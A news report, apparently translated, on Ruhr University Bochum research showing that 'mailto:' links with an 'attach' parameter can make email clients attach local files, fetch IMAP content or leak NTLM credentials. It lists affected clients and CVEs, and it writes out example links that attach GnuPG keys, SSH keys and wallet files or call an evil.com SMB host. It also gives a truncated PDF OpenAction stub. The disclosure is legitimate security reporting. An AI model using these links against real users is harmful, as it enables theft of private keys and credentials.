Attacks on email client users using 'mailto:' links

Researchers from Ruhr University Bochum (Germany) analyzed (PDF) the behavior of email clients when processing 'mailto:' links with extended parameters. Five out of twenty examined email clients were found vulnerable to an attack that manipulates resource substitution using the 'attach' parameter. An additional six email clients were susceptible to attacks exploiting PGP and S/MIME key replacements, while three clients were vulnerable to content extraction attacks from encrypted messages.

'Linksmailto:' are used to automate the opening of an email client for composing a message to the recipient specified in the link. In addition to the address, the link can include extra parameters, such as the email subject and template for standard content. The proposed attack manipulates the 'attach' parameter, allowing the attachment of files to the composed email.

The email clients Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089), and Pegasus Mail were found vulnerable to a trivial attack that enables the automatic attachment of any local file specified through a 'mailto:?attach=file_path' link. The file gets attached without a warning, so without special attention, the user may not notice that the email will be sent with the attachment.

For example, using a link like 'mailto:?to=user@example.com&subject=Title&body=Text&attach=~/.gnupg/secring.gpg' allows you to embed private keys from GnuPG in the email. You can also send the contents of cryptocurrency wallets (~/.bitcoin/wallet.dat), SSH keys (~/.ssh/id_rsa), and any files accessible to the user. Moreover, Thunderbird allows attaching groups of files using patterns like 'attach=/tmp/*.txt'.

In addition to local files, some email clients process links to network storage and paths on IMAP servers. In particular, IBM Notes allows the retrieval of a file from a network directory when handling links like 'attach=\\evil.com\dummyfile', and it can also intercept NTLM authentication parameters by directing a link to an SMB server controlled by the attacker (the request will be sent with the current user's authentication parameters).

Thunderbird successfully processes requests like «attach=imap:///fetch>UID>/INBOX>1/», allowing the attachment of content from folders on an IMAP server. Meanwhile, emails extracted from IMAP that are encrypted via OpenPGP and S/MIME are automatically decrypted by the email client before being sent. The Thunderbird developers were informed of the issue in February, and in the release Thunderbird 78 the problem has already been fixed (Thunderbird versions 52, 60, and 68 remain vulnerable).

Older versions of Thunderbird have also been found vulnerable to two other types of attacks on PGP and S/MIME proposed by researchers. Specifically, an attack involving key replacement was applicable to Thunderbird, as well as OutLook, PostBox, eM Client, MailMate, and R2Mail2. This is due to the fact that the email client automatically imports and installs new certificates transferred in S/MIME messages, allowing an attacker to substitute the user's already saved public keys.

The second attack that affects Thunderbird, PostBox, and MailMate manipulates the features of the auto-save mechanism for message drafts and allows, using mailto parameters, to initiate the decryption of encrypted messages or the addition of a digital signature for arbitrary messages, subsequently transmitting the result to the attacker's IMAP server. The ciphertext in this attack is passed through the parameter «body», and the «meta refresh» tag is used to initiate the request to the attacker's IMAP server. For example: ‘’

For automatic processing of «mailto:” links without user involvement, specially formatted PDF documents can be used — the OpenAction in PDF allows the automatic launch of the mailto handler upon opening the document:

%PDF-1.5
1 0 obj
<>
endobj

2 0 obj
<>
endobj

Attack on email client users via "mailto:" links

Source: opennet.ru

Buy reliable website hosting with DDoS protection, VPS VDS servers 🔥 Buy reliable website hosting with DDoS protection, VPS VDS servers | ProHoster